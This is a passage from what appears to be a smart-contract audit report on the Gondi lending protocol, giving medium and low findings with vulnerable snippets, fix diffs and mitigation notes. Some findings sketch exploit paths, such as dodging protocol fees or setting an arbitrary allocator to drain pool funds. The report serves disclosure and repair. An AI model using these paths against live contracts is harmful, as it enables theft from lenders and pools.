If the old BaseInterestAllocator already has a large balance, the balance of the Pool will increase dramatically. Subsequent users executing reallocate() will get a big bonus getReallocationBonus.

    function reallocate() external nonReentrant returns (uint256) {
        (uint256 currentBalance, uint256 targetIdle) = _reallocate();
        uint256 delta = currentBalance > targetIdle ? currentBalance - targetIdle : targetIdle - currentBalance;
@>      uint256 shares = delta.mulDivDown(totalSupply * getReallocationBonus, totalAssets() * _BPS);

        _mint(msg.sender, shares);

        emit Reallocated(delta, shares);

        return shares;

Assuming old BaseInterestAllocator balance: 1 M: shares = 1 M * (1 - optimalIdleRange.mid) * totalSupply * getReallocationBonus / totalAssets()


After change, BaseInterestAllocator may pay large getReallocationBonus.

Execute _reallocate() in the confirmBaseInterestAllocator() method without paying any getReallocationBonus.

    function confirmBaseInterestAllocator(address _newBaseInterestAllocator) external {
        address cachedAllocator = getBaseInterestAllocator;
        if (cachedAllocator != address(0)) {
            if (getPendingBaseInterestAllocatorSetTime + UPDATE_WAITING_TIME > block.timestamp) {
                revert TooSoonError();
            if (getPendingBaseInterestAllocator != _newBaseInterestAllocator) {
                revert InvalidInputError();
            asset.approve(cachedAllocator, 0);
        asset.approve(_newBaseInterestAllocator, type(uint256).max);

        getBaseInterestAllocator = _newBaseInterestAllocator;
        getPendingBaseInterestAllocator = address(0);
        getPendingBaseInterestAllocatorSetTime = type(uint256).max;
+       if (cachedAllocator != address(0)) {
+             _reallocate();
+       }
        emit BaseInterestAllocatorSet(_newBaseInterestAllocator);

Assessed type


0xend (Gondi) confirmed

0xA5DF (judge) decreased severity to Medium and commented:

Marking as Medium since it’ll only take the fee part (which is only a small percentage I guess). I guess also the allocator isn’t going to change very often.

Gondi mitigated:

Proactively reallocate (we got rid of the bonus though).

Status: Mitigation confirmed. Full details in reports from oakcobalt and bin2chen.

[M-14] loanLiquidation() calculation of interest is not accurate

Submitted by bin2chen

loanLiquidation(): The calculated interest codes are as follows:

    function loanLiquidation(
        uint256 _loanId,
        uint256 _principalAmount,
        uint256 _apr,
        uint256 _protocolFee,
        uint256 _received,
        uint256 _startTime
    ) external override onlyAcceptedCallers {
        uint256 netApr = _netApr(_apr, _protocolFee);
        uint256 interestEarned = _principalAmount.getInterest(netApr, block.timestamp - _startTime);
@>      uint256 fees = IFeeManager(getFeeManager).processFees(_received, 0);
        getCollectedFees += fees;
        _loanTermination(msg.sender, _loanId, _principalAmount, netApr, interestEarned, _received - fees);

contract FeeManager is IFeeManager, TwoStepOwned {
    function processFees(uint256 _principal, uint256 _interest) external view returns (uint256) {
        /// @dev cached
        Fees memory __fees = _fees;
        return _principal.mulDivDown(__fees.managementFee, PRECISION)
            + _interest.mulDivDown(__fees.performanceFee, PRECISION);

The above code takes all of _received as the principal and gives it to IFeeManager to calculate. But the amount received from the bidding is not always less than the principal, it may be more than the principal, and this part should be calculated as interest.


When received is greater than the principal, fees is not correct.

    function loanLiquidation(
        uint256 _loanId,
        uint256 _principalAmount,
        uint256 _apr,
        uint256 _protocolFee,
        uint256 _received,
        uint256 _startTime
    ) external override onlyAcceptedCallers {
        uint256 netApr = _netApr(_apr, _protocolFee);
        uint256 interestEarned = _principalAmount.getInterest(netApr, block.timestamp - _startTime);
-       uint256 fees = IFeeManager(getFeeManager).processFees(_received, 0);
+       uint256 fees;
+       if (_received > _principalAmount) {
+           fees = IFeeManager(getFeeManager).processFees(_principalAmount, _received - _principalAmount);
+       }else {
+           fees = IFeeManager(getFeeManager).processFees(_received, 0);
+       }
        getCollectedFees += fees;
        _loanTermination(msg.sender, _loanId, _principalAmount, netApr, interestEarned, _received - fees);

Assessed type


0xend (Gondi) confirmed

Gondi mitigated:

Corrected calculation of fees as suggested.

Status: Mitigation confirmed. Full details in reports from oakcobalt, minhquanym and bin2chen.

[M-15] confirmUnderwriter() need to recalculate getMinTimeBetweenWithdrawalQueues

Submitted by bin2chen

getMinTimeBetweenWithdrawalQueues is very important for Pool. If getMinTimeBetweenWithdrawalQueues is too small, pendingQueues will be overwritten too early, and when Loan pays off, it won’t be able to find the corresponding queues.

So we will calculate getMinTimeBetweenWithdrawalQueues by MaxDuration + _LOAN_BUFFER_TIME to make sure it won’t be overwritten too early.

        address _feeManager,
        address _offerHandler,
        uint256 _waitingTimeBetweenUpdates,
        OptimalIdleRange memory _optimalIdleRange,
        uint256 _maxTotalWithdrawalQueues,
        uint256 _reallocationBonus,
        ERC20 _asset,
        string memory _name,
        string memory _symbol
    ) ERC4626(_asset, _name, _symbol) LoanManager(tx.origin, _offerHandler, _waitingTimeBetweenUpdates) {


@>      getMinTimeBetweenWithdrawalQueues = (IPoolOfferHandler(_offerHandler).getMaxDuration() + _LOAN_BUFFER_TIME)
            .mulDivUp(1, _maxTotalWithdrawalQueues);

But switching the new getUnderwriter/_offerHandler doesn’t recalculate the getMinTimeBetweenWithdrawalQueues.

    function confirmUnderwriter(address __underwriter) external onlyOwner {
        if (getPendingUnderwriterSetTime + UPDATE_WAITING_TIME > block.timestamp) {
            revert TooSoonError();
        if (getPendingUnderwriter != __underwriter) {
            revert InvalidInputError();

@>      getUnderwriter = __underwriter;
        getPendingUnderwriter = address(0);
        getPendingUnderwriterSetTime = type(uint256).max;

        emit UnderwriterSet(__underwriter);

This may break the expectation of getMinTimeBetweenWithdrawalQueues, and the new getUnderwriter.getMaxDuration is larger than the old one; which may cause pendingQueues to be overwritten prematurely.


The new getUnderwriter.getMaxDuration is larger than the old one, which may cause pendingQueues to be overwritten prematurely.

Pool overrides confirmUnderwriter() with an additional recalculation of getMinTimeBetweenWithdrawalQueues and must not be smaller than the old one, to avoid premature overwriting of the previous one.

contract Pool is ERC4626, InputChecker, IPool, IPoolWithWithdrawalQueues, LoanManager, ReentrancyGuard {
-   uint256 public immutable getMinTimeBetweenWithdrawalQueues;
+   uint256 public getMinTimeBetweenWithdrawalQueues;
+   function confirmUnderwriter(address __underwriter) external override onlyOwner {
+           super.confirmUnderwriter(__underwriter);
+           uint256 newMinTime = (IPoolOfferHandler(__underwriter).getMaxDuration() + _LOAN_BUFFER_TIME)
+            .mulDivUp(1, _maxTotalWithdrawalQueues);
+           require(newMinTime >= getMinTimeBetweenWithdrawalQueues,"invalid");
+           getMinTimeBetweenWithdrawalQueues = newMinTime;
+    }

Assessed type


0xend (Gondi) confirmed

Gondi mitigated:

Added check (maxDuration cannot be longer).

Status: Mitigation confirmed. Full details in reports from oakcobalt, bin2chen and minhquanym.

[M-16] distribute() uses the wrong end time to break maxSeniorRepayment’s expectations

Submitted by bin2chen

When the bid amount is not enough, the lender will be repaid in order of tranche[]. In order to minimize the risk, the user can specify maxSeniorRepayment to avoid the risk to some extent, and put himself in a position of higher repayment priority. At the same time emitLoan() checks maxSeniorRepayment for the emitLoan().

emitLoan() -> _processOffersFromExecutionData() -> _checkOffer()

    function _processOffersFromExecutionData(
        address _borrower,
        address _principalReceiver,
        address _principalAddress,
        address _nftCollateralAddress,
        uint256 _tokenId,
        uint256 _duration,
        OfferExecution[] calldata _offerExecution
    ) private returns (uint256, uint256[] memory, Loan memory, uint256) {
            uint256 amount = thisOfferExecution.amount;
            address lender = offer.lender;
            /// @dev Please note that we can now have many tranches with same `loanId`.
            tranche[i] = Tranche(loanId, totalAmount, amount, lender, 0, block.timestamp, offer.aprBps);
            totalAmount += amount;
@>          totalAmountWithMaxInterest += amount + amount.getInterest(offer.aprBps, _duration);

    function _checkOffer(
        LoanOffer calldata _offer,
        address _principalAddress,
        address _nftCollateralAddress,
        uint256 _amountWithInterestAhead
    ) private pure {
        if (_offer.principalAddress != _principalAddress || _offer.nftCollateralAddress != _nftCollateralAddress) {
            revert InvalidAddressesError();
@>      if (_amountWithInterestAhead > _offer.maxSeniorRepayment) {
            revert InvalidTrancheError();

totalAmountWithMaxInterest is computed using loan._duration. But when the bidding ends and the distribution is done in LiquidationDistributor.distribute(), the current time is used to calculate Interest.

    function distribute(uint256 _proceeds, IMultiSourceLoan.Loan calldata _loan) external {
        uint256[] memory owedPerTranche = new uint256[](_loan.tranche.length);
        uint256 totalPrincipalAndPaidInterestOwed = _loan.principalAmount;
        uint256 totalPendingInterestOwed = 0;
        for (uint256 i = 0; i < _loan.tranche.length;) {
            IMultiSourceLoan.Tranche calldata thisTranche = _loan.tranche[i];
            uint256 pendingInterest =
@>              thisTranche.principalAmount.getInterest(thisTranche.aprBps, block.timestamp - thisTranche.startTime);
            totalPrincipalAndPaidInterestOwed += thisTranche.accruedInterest;
            totalPendingInterestOwed += pendingInterest;
            owedPerTranche[i] += thisTranche.principalAmount + thisTranche.accruedInterest + pendingInterest;
            unchecked {

Because bidding takes a certain amount of time (~3-7 days), using block.timestamp - thisTranche.startTime will be larger than expected! Correctly should use: (loan.startTime + loan.duration - thisTranche.startTime) to calculate the interest.

This leads to the problem that if there are not enough funds, the front lender will get a larger repayment than expected, breaking the back lender’s initial expectation of maxSeniorRepayment.


If there are not enough funds, the initial expectation of maxSeniorRepayment may be broken.

    function distribute(uint256 _proceeds, IMultiSourceLoan.Loan calldata _loan) external {
        uint256[] memory owedPerTranche = new uint256[](_loan.tranche.length);
        uint256 totalPrincipalAndPaidInterestOwed = _loan.principalAmount;
        uint256 totalPendingInterestOwed = 0;
+      uint256 loanExpireTime = _loan.startTime + _loan.duration;
        for (uint256 i = 0; i < _loan.tranche.length;) {
            IMultiSourceLoan.Tranche calldata thisTranche = _loan.tranche[i];
            uint256 pendingInterest =
-               thisTranche.principalAmount.getInterest(thisTranche.aprBps, block.timestamp - thisTranche.startTime);
+               thisTranche.principalAmount.getInterest(thisTranche.aprBps, loanExpireTime - thisTranche.startTime);
            totalPrincipalAndPaidInterestOwed += thisTranche.accruedInterest;
            totalPendingInterestOwed += pendingInterest;
            owedPerTranche[i] += thisTranche.principalAmount + thisTranche.accruedInterest + pendingInterest;
            unchecked {

Assessed type


0xend (Gondi) confirmed

Gondi mitigated:

Changed to loan end time (instead of current timestamp).

Status: Mitigation confirmed. Full details in reports from oakcobalt, bin2chen and minhquanym.

[M-17] loan.hash() does not contain protocolFee

Submitted by bin2chen, also found by oakcobalt and minhquanym

The current IMultiSourceLoan.loop.hash() does not contain protocolFee:

    function emitLoan(LoanExecutionData calldata _loanExecutionData)
        returns (uint256, Loan memory)
@>      _loans[loanId] = loan.hash();
        emit LoanEmitted(loanId, offerIds, loan, totalFee);

        return (loanId, loan);

    function hash(IMultiSourceLoan.Loan memory _loan) internal pure returns (bytes32) {
        bytes memory trancheHashes;
        for (uint256 i; i < _loan.tranche.length;) {
            trancheHashes = abi.encodePacked(trancheHashes, _hashTranche(_loan.tranche[i]));
            unchecked {
        return keccak256(
@>              //@audit miss protocolFee

   struct Loan {
        address borrower;
        uint256 nftCollateralTokenId;
        address nftCollateralAddress;
        address principalAddress;
        uint256 principalAmount;
        uint256 startTime;
        uint256 duration;
        Tranche[] tranche;
@>      uint256 protocolFee;

Then, you can specify protocolFee arbitrarily in many methods, but the _baseLoanChecks() security check doesn’t revert.

    function _baseLoanChecks(uint256 _loanId, Loan memory _loan) private view {
@>      if (_loan.hash() != _loans[_loanId]) {
            revert InvalidLoanError(_loanId);
        if (_loan.startTime + _loan.duration < block.timestamp) {
            revert LoanExpiredError();

Example: repayLoan(loadn.protocolFee=0) to escape fees and cause a LoanManager accounting error. refinancePartial()/refinanceFull() can also specify the wrong fees to skip the fees.


The loan hash does not contain a protocolFee, leading to an arbitrary protocolFee that can be specified to escape fees or cause an accounting error.

    function hash(IMultiSourceLoan.Loan memory _loan) internal pure returns (bytes32) {
        bytes memory trancheHashes;
        for (uint256 i; i < _loan.tranche.length;) {
            trancheHashes = abi.encodePacked(trancheHashes, _hashTranche(_loan.tranche[i]));
            unchecked {
        return keccak256(
+               _loan.protocolFee

Assessed type


0xend (Gondi) confirmed

0xA5DF (judge) decreased severity to Medium and commented:

Avoiding fees is just a Medium. For the accounting error, I’ll need more proof that this can lead to something significant to mark this as High.

Gondi mitigated:

Added field in hash.

Status: Mitigation confirmed. Full details in reports from oakcobalt, minhquanym and bin2chen.

[M-18] distribute() when can’t repay all lenders, may lack of notification to LoanManager for accounting

Submitted by bin2chen

The LiquidationDistributor is used to distribute funds after an auction. When the auction amount is insufficient, lenders are repaid in sequence.

    function distribute(uint256 _proceeds, IMultiSourceLoan.Loan calldata _loan) external {
        if (_proceeds > totalPrincipalAndPaidInterestOwed + totalPendingInterestOwed) {
            for (uint256 i = 0; i < _loan.tranche.length;) {
                IMultiSourceLoan.Tranche calldata thisTranche = _loan.tranche[i];
                    totalPrincipalAndPaidInterestOwed + totalPendingInterestOwed
                unchecked {
        } else {
@>          for (uint256 i = 0; i < _loan.tranche.length && _proceeds > 0;) {
                IMultiSourceLoan.Tranche calldata thisTranche = _loan.tranche[i];
                _proceeds = _handleTrancheInsufficient(
                    _loan.principalAddress, thisTranche, msg.sender, _proceeds, owedPerTranche[i]
                unchecked {

The code snippet above introduces a condition _proceeds > 0 to terminate the loop when there’s no remaining balance in _proceeds, thereby preventing further execution of _handleTrancheInsufficient().

However, this approach creates an issue. If the subsequent lender is a LoanManager, it won’t be notified for accounting via _handleTrancheInsufficient() -> _handleLoanManagerCall() -> LoanManager(_tranche.lender).loanLiquidation().

Although no funds can be repaid, accounting is still necessary to notice and prevent incorrect accounting, causing inaccuracies in totalAssets() and continued accumulation of interest. This outstanding debt should be shared among current users and prevent it from persisting as bad debt.


Failure to notify LoanManager.loanLiquidation() may result in accounting inaccuracies.

    function distribute(uint256 _proceeds, IMultiSourceLoan.Loan calldata _loan) external {
        } else {
-           for (uint256 i = 0; i < _loan.tranche.length && _proceeds > 0;) {
+           for (uint256 i = 0; i < _loan.tranche.length;) {
                IMultiSourceLoan.Tranche calldata thisTranche = _loan.tranche[i];
                _proceeds = _handleTrancheInsufficient(
                    _loan.principalAddress, thisTranche, msg.sender, _proceeds, owedPerTranche[i]
                unchecked {

Assessed type


0xend (Gondi) confirmed

Gondi mitigated:

Always call loanManager (even if 0 proceeds).

Status: Mitigation confirmed. Full details in reports from oakcobalt, minhquanym and bin2chen.

[M-19] Bidders might lose funds due to possible racing condition between settleWithBuyout and placeBid

Submitted by oakcobalt, also found by oakcobalt

In AuctionWithBuyoutLoanLiquidator.sol, settleWithBuyout and placeBid are allowed at an overlapping timestamp (_auction.startTime + _timeForMainLenderToBuy). This allows settleWithBuyout and placeBid to be settled at the same block.

When placeBid tx settles at _auction.startTime + _timeForMainLenderToBuy before settleWithBuyout tx, the bidder will lose their funds. Because settleWithBuyout will always assume no bids are placed, it will directly transfer out the collateral NFT token and delete the auction data from storage.

    function settleWithBuyout(
        address _nftAddress,
        uint256 _tokenId,
        Auction calldata _auction,
        IMultiSourceLoan.Loan calldata _loan
    ) external nonReentrant {
        uint256 timeLimit = _auction.startTime + _timeForMainLenderToBuy;
 |>       if (timeLimit < block.timestamp) {
            revert OptionToBuyExpiredError(timeLimit);


    function _placeBidChecks(address _nftAddress, uint256 _tokenId, Auction memory _auction, uint256 _bid)
        uint256 timeLimit = _auction.startTime + _timeForMainLenderToBuy;
|>        if (timeLimit > block.timestamp) {
            revert OptionToBuyStilValidError(timeLimit);


Consider to only allow buyout strictly before the timeLimit if (timeLimit <= block.timestamp) {//revert.

0xend (Gondi) confirmed

Gondi mitigated:

Strict to >=.

Status: Mitigation confirmed. Full details in reports from oakcobalt, minhquanym and bin2chen.

[M-20] Hardcoded incorrect getLidoData timestamp, resulting in incorrect base point Apr. Loans can be validated with a substantially low baseRate interest

Submitted by oakcobalt

In LidoEthBaseInterestAllocator.sol, getLidoData is initialized with an incorrect timestamp, causing subsequent baseApr to be incorrect.

In constructor, getLidoData is initialized with 0 timestamp. This should be block.timestamp instead. As a result, baseApr updates will be much lower:


    struct LidoData {
        uint96 lastTs;
        uint144 shareRate;
        uint16 aprBps;
        address _pool,
        address payable __curvePool,
        address payable __weth,
        address __lido,
        uint256 _currentBaseAprBps,
        uint96 _lidoUpdateTolerance
    ) Owned(tx.origin) {
          //@audit 0-> block.timestamp
|>        getLidoData = LidoData(0, uint144(_currentShareRate()), uint16(_currentBaseAprBps));


For example, in _updateLidoValue(), _lidoData.aprBps is calculated based on delta shareRate, divided by delta timespan. (_BPS * _SECONDS_PER_YEAR * (shareRate - _lidoData.shareRate) / _lidoData.shareRate/ (block.timestamp - _lidoData.lastTs)) shareRate and _lidoData.shareRate are associated with current timestamp, and deployment timestamp respectively. But timespan would be (block.timestamp - 0). This deflated _lidoData.aprBps value, which is used to validate Loan offers in Pool.sol during loan initiation.

In PoolOfferHandler.sol, this allows loan offers with substantially low aprBps to pass the minimal apr check.

    function validateOffer(uint256 _baseRate, bytes calldata _offer)
        returns (uint256 principalAmount, uint256 aprBps)
        if (offerExecution.offer.aprBps < _baseRate + aprPremium || aprPremium == 0) {
            revert InvalidAprError();


Loans with invalid aprs can be created.

Use block.timestamp to initialize getLidoData.

Assessed type


0xend (Gondi) confirmed

0xA5DF (judge) decreased severity to Medium and commented:

Marking as Medium since this only impacts interest and it’s limited to the initial phase of the contract.

Gondi mitigated:

Set right value for getLidoData timestamp.

Status: Mitigation confirmed. Full details in reports from oakcobalt, minhquanym and bin2chen.

Low Risk and Non-Critical Issues

For this audit, 3 reports were submitted by wardens detailing low risk and non-critical issues. The report highlighted below by minhquanym received the top score from the judge.

The following wardens also submitted reports: oakcobalt and bin2chen.

[01] No need to approve __aavePool to spend __aToken



The AavePool can burn the aToken directly without any allowance from burner address. So the call to approve aToken in the constructor of AaveUsdcBaseInterestAllocator contract is unnecessary.

constructor(address _pool, address __aavePool, address __usdc, address __aToken) Owned(tx.origin) {
    if (address(Pool(_pool).asset()) != address(__usdc)) {
        revert InvalidPoolError();
    getPool = _pool;
    _aavePool = __aavePool;
    _usdc = __usdc;
    _aToken = __aToken;
    ERC20(__usdc).approve(__aavePool, type(uint256).max);
     // @audit No need to approve aToken
    ERC20(__aToken).approve(__aavePool, type(uint256).max);

Check out the AavePool code here.

[02] Open TODOs







There are a lot of open TODOs in the codebase. They indicate there are some missing functionalities needed to be implemented. For example:

function claimRewards() external {
    /// TODO: getIncentivesController

[03] Function burnAndWithdraw() does not withdraw old ERC721s



The function burnAndWithdraw() should burn the vault and withdraw all assets in that vault. However, the old ERC721 is not withdrawn.

function burnAndWithdraw( // @audit Not withdraw old ERC721
    uint256 _vaultId,
    address[] calldata _collections,
    uint256[] calldata _tokenIds,
    address[] calldata _tokens
) external {
    _thisBurn(_vaultId, msg.sender);
    for (uint256 i = 0; i < _collections.length;) {
        _withdrawERC721(_vaultId, _collections[i], _tokenIds[i]);
        unchecked {
    for (uint256 i = 0; i < _tokens.length;) {
        _withdrawERC20(_vaultId, _tokens[i]);
        unchecked {

[04] Function in BytesLib could revert with no error message



All functions in BytesLib have some require check for overflow. However, these checks will only work with Solidity version < 0.8 because Solidity 0.8 already has some overflow check.

For example, in the function slice(), in the case overflow actually happens in the first check, the calculation _length + 31 is already revert by solidity 0.8 before checking the condition in the require.

function slice(bytes memory _bytes, uint256 _start, uint256 _length) internal pure returns (bytes memory) {
    require(_length + 31 >= _length, "slice_overflow");
    require(_start + _length >= _start, "slice_overflow"); // @audit These calculation will revert with solidity 0.8
    require(_bytes.length >= _start + _length, "slice_outOfBounds");

[05] setProtocolFee() can be called multiple times to spam event emission



Function setProtocolFee() does not reset the pending value (_pendingProtocolFee). As the result, setProtocolFee() can be called infinite times. Even though the protocol fee cannot be changed, the event will be emit multiple times.

// @audit setProtocolFee can be called again since _pendingProtocolFeeSetTime is not reset
function setProtocolFee() external virtual { 

function _setProtocolFee() internal {
    if (block.timestamp < _pendingProtocolFeeSetTime + FEE_UPDATE_NOTICE) {
        revert TooSoonError();
    ProtocolFee memory protocolFee = _pendingProtocolFee;
    _protocolFee = protocolFee;

    emit ProtocolFeeUpdated(protocolFee);

[06] Repayment and liquidation could be blocked if token has a callhook to receiver





Some tokens like ERC777 has a callhook on receiver address. If these tokens are used in a loan, it could allow attacker to force liquidation/repayment to fail. For example, the function settleAuction() transfer the fee to originator. The originator could be an contract that will revert when receiving token transfer, making it impossible for auction to settle.

asset.safeTransfer(_auction.originator, triggerFee); // @audit can revert if the token has callhook on receiver
asset.safeTransfer(msg.sender, triggerFee);

[07] Wrong event emission in finalUpdateMultiSourceLoanAddress()



Wrong variable is used when emit MultiSourceLoanUpdated event.

function finalUpdateMultiSourceLoanAddress(address _newAddress) external onlyOwner {
    if (_pendingMultiSourceLoanAddress != _newAddress) {
        revert InvalidAddressUpdateError();

    _multiSourceLoan = MultiSourceLoan(_pendingMultiSourceLoanAddress);
    _pendingMultiSourceLoanAddress = address(0);

    // @audit wrong event, _pendingMultiSourceLoanAddress is already reset to 0
    emit MultiSourceLoanUpdated(_pendingMultiSourceLoanAddress);

[08] addCallers() does not check _callers.length == pendingCallers.length



Function lacking check to ensure the pending list is the same as the list input by caller.

function addCallers(PendingCaller[] calldata _callers) external onlyOwner {
    if (getPendingAcceptedCallersSetTime + UPDATE_WAITING_TIME > block.timestamp) {
        revert TooSoonError();
    PendingCaller[] memory pendingCallers = getPendingAcceptedCallers; // @audit not check _callers.length == pendingCallers.length
    for (uint256 i = 0; i < _callers.length;) {

    emit CallersAdded(_callers);

[09] Partial refinance offer could be used in refinanceFull()



The function refinanceFull() does not verify the _renegotiationOffer.trancheIndex to ensure it includes all the indexes of the current loan.

    function refinanceFull(
        RenegotiationOffer calldata _renegotiationOffer,
        Loan memory _loan,
        bytes calldata _renegotiationOfferSignature
    ) external nonReentrant returns (uint256, Loan memory) { // @audit not check _renegotiationOffer.trancheIndex.length = 0
        _baseLoanChecks(_renegotiationOffer.loanId, _loan);
        _baseRenegotiationChecks(_renegotiationOffer, _loan);

As a result, if a lender signs a partial refinance offer, others could use the same signature to call refinanceFull(). This could act against the lender’s intention when signing the offer.

[10] Owner can set _multiSourceLoan to address(0) directly without updateMultiSourceLoanAddressFirst()



The _pendingMultiSourceLoanAddress has default value is address(0). As the result, owner could always call finalUpdateMultiSourceLoanAddress() to set the _multiSourceLoan to address(0) without calling updateMultiSourceLoanAddressFirst() first.

    function finalUpdateMultiSourceLoanAddress(address _newAddress) external onlyOwner { // @audit can set `_multiSourceLoan` to address(0) directly without `updateMultiSourceLoanAddressFirst()`
        if (_pendingMultiSourceLoanAddress != _newAddress) {
            revert InvalidAddressUpdateError();

        _multiSourceLoan = MultiSourceLoan(_pendingMultiSourceLoanAddress);
        _pendingMultiSourceLoanAddress = address(0);

        emit MultiSourceLoanUpdated(_pendingMultiSourceLoanAddress);

[11] Slippage of stETH swap could make validateOffer() revert



The MultiSourceLoan contract calls the validateOffer() function to verify that the loan term has been approved by the Pool contract. This function also draws the necessary capital from the base interest allocator to ensure a sufficient balance for the loan.

As the pool’s balance includes capital awaiting claim by the queues, it needs to verify that the pool has enough capital to fund the loan. If this isn’t the case, and the principal exceeds the current balance, the function needs to reallocate part of it.

if (principalAmount > undeployedAssets) {
    revert InsufficientAssetsError();
} else if (principalAmount > currentBalance) {
    IBaseInterestAllocator(getBaseInterestAllocator).reallocate( // @audit slippage of Lido swap could make the pool insufficient
        currentBalance, principalAmount - currentBalance, true

However, the reallocate() function for the LidoEthBaseInterestAllocator performs a swap that could cause slippage. This could result in the contract still not having enough balance to provide the loan, even after calling reallocate().

[12] Modifier onlyReadyForWithdrawal is repeatedly execute when users withdraw multiple tokens



modifier onlyReadyForWithdrawal(uint256 _vaultId) { // @audit Repeatedly checked when withdraw multiple tokens
    if (_readyForWithdrawal[_vaultId] != msg.sender) {
        revert NotApprovedError(_vaultId);

The onlyReadyForWithdrawal modifier is used to check if the vault can be withdrawn and the permitted caller is call it. However, this check is performed in internal function, making it repeatedly call for the same _vaultId when users withdraw more than 1 token.

function withdrawERC721s(uint256 _vaultId, address[] calldata _collections, uint256[] calldata _tokenIds)
    for (uint256 i = 0; i < _collections.length;) {
        _withdrawERC721(_vaultId, _collections[i], _tokenIds[i]);
        unchecked {

function _withdrawERC721(uint256 _vaultId, address _collection, uint256 _tokenId)

[13] Should use defined variable in function _checkValidators()


function _checkValidators(LoanOffer calldata _loanOffer, uint256 _tokenId) private {
    uint256 offerTokenId = _loanOffer.nftCollateralTokenId;
    // @audit Should use the cache value above
    if (_loanOffer.nftCollateralTokenId != 0) {

[14] Function _checkStrictlyBetter() does not check for ImprovementMinimum

Note: At the judge’s request here, this downgraded issue from the same warden has been included in this report for completeness.



The ImprovementMinimum defines the minimum improvement (in BPS) required for a strict improvement when users refinance an existing loan.

struct ImprovementMinimum {
    uint256 principalAmount;
    uint256 interest;
    uint256 duration;

At deployment, its value is set as:

ImprovementMinimum internal _minimum = ImprovementMinimum(500, 100, 100);

The code snippets above demonstrate that three improvements are required when users refinance: principal amount, interest, and loan duration. However, the function _checkStrictlyBetter() currently checks only the APR (interest) in _checkTrancheStrictly(). The other principalAmount and endTime are checked to be larger than the previous values but not checked for minimum improvement in the function _checkStrictlyBetter().

Proof of Concept

As you can see, the _checkTrancheStrictly() checks the APR to be improved by __minimum.interest. However, the duration is only checked to be _offerEndTime < _loanEndTime in _checkStrictlyBetter().

function _checkTrancheStrictly(
    bool _isStrictlyBetter,
    uint256 _currentAprBps,
    uint256 _targetAprBps,
    ImprovementMinimum memory __minimum
) private pure {
    /// @dev If _isStrictlyBetter is set, and the new apr is higher, then it'll underflow.
    if (
            && ((_currentAprBps - _targetAprBps).mulDivDown(_PRECISION, _currentAprBps) < __minimum.interest)
    ) {
        revert InvalidRenegotiationOfferError();

// @audit not check ImprovementMinimum for principalAmount and endTime
if (
        (_offerPrincipalAmount - _loanPrincipalAmount > 0)
            && (
                (_loanAprBps * _loanPrincipalAmount - _offerAprBps * _offerPrincipalAmount).mulDivDown(
                    _PRECISION, _loanAprBps * _loanPrincipalAmount
                ) < minimum.interest
    ) || (_offerFee > 0) || (_offerEndTime < _loanEndTime) 
) {
    revert NotStrictlyImprovedError();

Add check to ensure the required minimum improvement when users refinance a loan.

Assessed type

Invalid Validation

0xend (Gondi) acknowledged and commented:

We should get rid of this one. This was left as legacy (only improving apr matters).

0xA5DF (judge) decreased severity to Low and commented:

Thanks, it indeed seems from the code that those checks were supposed to run, therefore this is a valid issue. However, regarding severity - I fail to see why this is a significant issue. How does this impact the borrower or other users?

0xend (Gondi) commented:

No impact on borrower/lender.

https://github.com/pixeldaogg/florida-contracts/pull/361 - changing.

[15] Owner cannot change the allocator address from address(0)

Note: At the judge’s request here, this downgraded issue from the same warden has been included in this report for completeness.



The base interest allocator is set in the Pool through two steps: setBaseInterestAllocator() and confirmBaseInterestAllocator(). The confirmBaseInterestAllocator() function can be called by anyone.

This function executes the logic using the _newBaseInterestAllocator input from the caller, not the value set by the owner in setBaseInterestAllocator(). The check for _newBaseInterestAllocator == getPendingBaseInterestAllocator is only done when cachedAllocator != address(0).

After all, the pending values are reset. getPendingBaseInterestAllocator is reset to address(0) and getPendingBaseInterestAllocatorSetTime is reset to type(uint256).max. An attacker could exploit this to prevent the owner from changing the allocator address from address(0).

Proof of Concept

function confirmBaseInterestAllocator(address _newBaseInterestAllocator) external {
    address cachedAllocator = getBaseInterestAllocator;
    if (cachedAllocator != address(0)) { 
        if (getPendingBaseInterestAllocatorSetTime + UPDATE_WAITING_TIME > block.timestamp) {
            revert TooSoonError();
        if (getPendingBaseInterestAllocator != _newBaseInterestAllocator) {
            revert InvalidInputError();
        asset.approve(cachedAllocator, 0);
    asset.approve(_newBaseInterestAllocator, type(uint256).max);

    getBaseInterestAllocator = _newBaseInterestAllocator;
    getPendingBaseInterestAllocator = address(0);
    getPendingBaseInterestAllocatorSetTime = type(uint256).max;

    emit BaseInterestAllocatorSet(_newBaseInterestAllocator);

When the owner tries to change the allocator address from an address(0) allocator, they need to call setBaseInterestAllocator(). This function records the request in getPendingBaseInterestAllocator and getPendingBaseInterestAllocatorSetTime.

If the attacker immediately calls the confirmBaseInterestAllocator() function with _newBaseInterestAllocator = address(0), the getPendingBaseInterestAllocator will reset, preventing the owner from ever setting a new base interest allocator.

Only allow owner to call confirmBaseInterestAllocator().

Assessed type


0xA5DF (judge) decreased severity to Low and commented:

If the attacker immediately calls the confirmBaseInterestAllocator() function with _newBaseInterestAllocator = address(0), the getPendingBaseInterestAllocator will reset, preventing the owner from ever setting a new base interest allocator.

If the attacker calls confirmBaseInterestAllocator() with the zero address then the owner can call this again with the right address. If the attacker calls this with anything else then the owner can call again setBaseInterestAllocator() and then confirmBaseInterestAllocator().

0xend (Gondi) confirmed

[16] Attacker can set arbitrary allocator in case cachedAllocator == address(0)

Note: At the judge’s request here, this downgraded issue from the same warden has been included in this report for completeness.



The base interest allocator is set in the Pool through two steps: setBaseInterestAllocator() and confirmBaseInterestAllocator(). The confirmBaseInterestAllocator() function allows anyone to call it.

This function will execute the logic using the _newBaseInterestAllocator input passed in by the caller, instead of the value set by the owner in setBaseInterestAllocator(). The verification for _newBaseInterestAllocator == getPendingBaseInterestAllocator is only performed when cachedAllocator != address(0).

As a result, if cachedAllocator == address(0), anyone can set an arbitrary address for the allocator. And since the asset is approved to the new allocator address, attacker could steal all the fund available in the Pool contract.

Proof of Concept

function confirmBaseInterestAllocator(address _newBaseInterestAllocator) external {
    address cachedAllocator = getBaseInterestAllocator;
    // @audit in case cachedAllocator = address(0), anyone can set arbitrary allocator 
    if (cachedAllocator != address(0)) { 
        if (getPendingBaseInterestAllocatorSetTime + UPDATE_WAITING_TIME > block.timestamp) {
            revert TooSoonError();
        if (getPendingBaseInterestAllocator != _newBaseInterestAllocator) {
            revert InvalidInputError();
        asset.approve(cachedAllocator, 0);
    asset.approve(_newBaseInterestAllocator, type(uint256).max);

    getBaseInterestAllocator = _newBaseInterestAllocator;
    getPendingBaseInterestAllocator = address(0);
    getPendingBaseInterestAllocatorSetTime = type(uint256).max;

